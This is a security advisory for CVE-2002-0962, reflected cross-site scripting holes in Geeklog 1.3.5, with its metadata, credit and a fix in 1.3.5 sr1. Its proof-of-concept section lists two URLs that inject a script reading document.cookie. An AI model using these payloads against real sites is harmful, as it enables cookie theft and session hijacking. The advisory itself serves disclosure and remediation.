Geeklog Multiple Cross Site Scripting Vulnerabilities
BID:4969
Info
Geeklog Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 4969 |
| Class: | Input Validation Error |
| CVE: |
CVE-2002-0962 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 10 2002 12:00AM |
| Updated: | Jul 11 2009 01:56PM |
| Credit: | Discovered by Ahmet Sabri ALPER <[email protected]>. |
| Vulnerable: |
Geeklog Geeklog 1.3.5 |
| Not Vulnerable: |
Geeklog Geeklog 1.3.5 sr1 |
Exploit / POC
Geeklog Multiple Cross Site Scripting Vulnerabilities
The following exploits have been provided by Ahmet Sabri ALPER <[email protected]>:
/index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
/comment.php?mode=display&sid=foo&pid=18&title=&lt;script&gt;alert(document.cookie)&lt;/script&gt;&type=article
The following exploits have been provided by Ahmet Sabri ALPER <[email protected]>:
/index.php?topic=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
/comment.php?mode=display&sid=foo&pid=18&title=&lt;script&gt;alert(document.cookie)&lt;/script&gt;&type=article
Solution / Fix
Geeklog Multiple Cross Site Scripting Vulnerabilities
Solution:
This issue has been addressed in Geeklog 1.3.5 sr1:
Geeklog Geeklog 1.3.5
Solution:
This issue has been addressed in Geeklog 1.3.5 sr1:
Geeklog Geeklog 1.3.5
-
Geeklog geeklog-1.3.5sr1
http://prdownloads.sourceforge.net/geeklog/geeklog-1.3.5sr1.tar.gz